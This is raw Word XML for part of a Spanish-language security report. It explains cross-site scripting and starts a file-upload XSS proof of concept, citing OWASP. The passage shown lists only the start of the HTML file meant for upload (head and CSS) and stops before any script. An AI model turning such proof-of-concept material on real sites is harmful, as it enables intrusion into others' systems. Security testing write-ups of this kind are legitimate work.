        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51B2FBA7" w14:textId="79788927" w:rsidR="002F3AD1" w:rsidRDefault="002F3AD1" w:rsidP="00C411C4">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora vamos a ver el informe:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20329B93" w14:textId="77777777" w:rsidR="002F3AD1" w:rsidRPr="00C411C4" w:rsidRDefault="002F3AD1" w:rsidP="00C411C4">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A47E7AF" w14:textId="73D14292" w:rsidR="00C411C4" w:rsidRDefault="008F3F14" w:rsidP="00D00BAB">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r w:rsidRPr="008F3F14">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1DF7F3A7" wp14:editId="2DA6D1F4">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0" b="508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5805170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF3DF70" w14:textId="4FCFA407" w:rsidR="008F3F14" w:rsidRDefault="008F3F14" w:rsidP="00D00BAB">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BD4804D" w14:textId="1FFB6D23" w:rsidR="008F3F14" w:rsidRDefault="008F3F14" w:rsidP="00D00BAB">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>Estas son las vulnerabilidades importantes que detecta:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B969B3B" w14:textId="2BCDCCCC" w:rsidR="008F3F14" w:rsidRDefault="008F3F14" w:rsidP="00D00BAB">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="113687F4" w14:textId="3CEC8F3B" w:rsidR="008F3F14" w:rsidRDefault="008F3F14" w:rsidP="00D00BAB">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r w:rsidRPr="008F3F14">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A3F9E5B" wp14:editId="55AAE452">
            <wp:extent cx="3878243" cy="933827"/>
            <wp:effectExtent l="0" t="0" r="825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78243" cy="933827"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFCDADE" w14:textId="77777777" w:rsidR="008F3F14" w:rsidRDefault="008F3F14" w:rsidP="00D00BAB">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B74620B" w14:textId="77777777" w:rsidR="00370303" w:rsidRDefault="00370303" w:rsidP="00D00BAB">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EB6B10D" w14:textId="77777777" w:rsidR="000472A2" w:rsidRPr="00610328" w:rsidRDefault="000472A2" w:rsidP="00EE57AC"/>
    <w:p w14:paraId="4BDA9BD3" w14:textId="64C87F7B" w:rsidR="004601B3" w:rsidRDefault="004601B3" w:rsidP="004601B3">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="_Toc128034158"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Pruebas de concepto (POC)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p w14:paraId="7ACF7470" w14:textId="03B2D5F7" w:rsidR="008B68A9" w:rsidRDefault="008B68A9" w:rsidP="008B68A9"/>
    <w:p w14:paraId="71B9FE41" w14:textId="63A9B0AC" w:rsidR="008B68A9" w:rsidRDefault="008B68A9">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="_Toc128034159"/>
      <w:r>
        <w:t>XSS -&gt;</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>
    </w:p>
    <w:p w14:paraId="7FEB9185" w14:textId="0B3A8FC2" w:rsidR="008B68A9" w:rsidRDefault="008B68A9" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60A9C371" w14:textId="50BD15E6" w:rsidR="008B68A9" w:rsidRDefault="008B68A9" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Voy a proceder a explicar esta vulnerabilidad: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FE049B" w14:textId="306EFD5A" w:rsidR="008B68A9" w:rsidRDefault="008B68A9" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cross-site-scripting (XSS) es una vulnerabilidad que permite </w:t>
      </w:r>
      <w:r w:rsidR="00312E63">
        <w:t>a un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> atacante inyectar código (normalmente HTML O JavaScript) en el contenido de un sitio web que no </w:t>
      </w:r>
      <w:r w:rsidR="00312E63">
        <w:t>está</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> baj0o el control del atacante. Cuando una </w:t>
      </w:r>
      <w:r w:rsidR="00312E63">
        <w:t>víctima</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ve una página de este tipo, el código inyectado se ejecuta en el navegador de esta víctima, por lo tanto, el atacante puede robar la información privada de la </w:t>
      </w:r>
      <w:r w:rsidR="00312E63">
        <w:t>víctima</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> asociada al </w:t>
      </w:r>
      <w:r w:rsidR="00312E63">
        <w:t>sitio</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> web en cuestión.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51EAE1EA" w14:textId="3AE9ADB1" w:rsidR="008B68A9" w:rsidRDefault="008B68A9" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31B9376B" w14:textId="30813A25" w:rsidR="008B68A9" w:rsidRDefault="008B68A9">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="49" w:name="_Toc128034160"/>
      <w:r>
        <w:t>File Upload XSS -&gt;</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>
    </w:p>
    <w:p w14:paraId="68A06572" w14:textId="3DD9912E" w:rsidR="008B68A9" w:rsidRDefault="008B68A9" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Este ataque está documentado por la OWASP Fundation: </w:t>
      </w:r>
      <w:hyperlink r:id="rId179" w:history="1">
        <w:r w:rsidRPr="008B68A9">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>enlace</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA37763" w14:textId="0316C722" w:rsidR="008B68A9" w:rsidRDefault="008B68A9" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t>Este ataque se basa en subir un archivo con código malicioso, para esta prueba de esta vulnerabilidad el código será el siguiente:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C565A87" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>&lt;!doctype html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DBB0C7" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>&lt;html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0219A3EE" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>&lt;head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB28893" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>&lt;meta charset="utf-8"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582E4233" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>&lt;title&gt;Untitled Page&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AE845C" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>&lt;style type="text/css"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F186B21" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>body</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D2A331" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CB3CE1" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">   background-color: #FFFFFF;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EB78C6" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">   color: #000000;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3885397E" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">   font-family: Arial;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FB7063" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">   font-weight: normal;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E136918" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">   font-size: 13px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B3A378" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">   line-height: 1.1875;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B932634" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">   margin: 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572DA395" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">   padding: 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE96D5D" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72154147" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>#TextArea1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34763F59" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37690B3B" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">   border: 1px solid #CCCCCC;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E09E5D" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">   border-radius: 4px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B283E02" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">   background-color: #FFFFFF;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DFC5F8" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">   background-image: none;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BA7CA9" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">   color: #000000;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4D1067" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">   font-family: Arial;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607B01F2" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">   font-weight: normal;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A069961" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">   font-style: normal;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3702F2" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">   font-size: 13px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B78B62F" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">   text-align: left;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F212B8" w14:textId="6E50FF75" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">   padding: 4px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C52165" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">   margin: 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529EDF9B" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">   overflow: auto;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F514D3" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">   resize: none;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2CC27C" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2DF51A" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>#TextArea1:focus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A20A90E" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62026A48" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">   border-color: #66AFE9;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B43116" w14:textId="2495FB2E" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">   box-shadow: inset 0px 1px rgba(0,0,0,0.075), 0px 8px rgba(102,175,233,0.60);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CBE62B" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">   outline: 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5149DCE8" w14:textId="77777777" w:rsidR="008B68A9" w:rsidRPr="00312E63" w:rsidRDefault="008B68A9" w:rsidP="00C66975">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
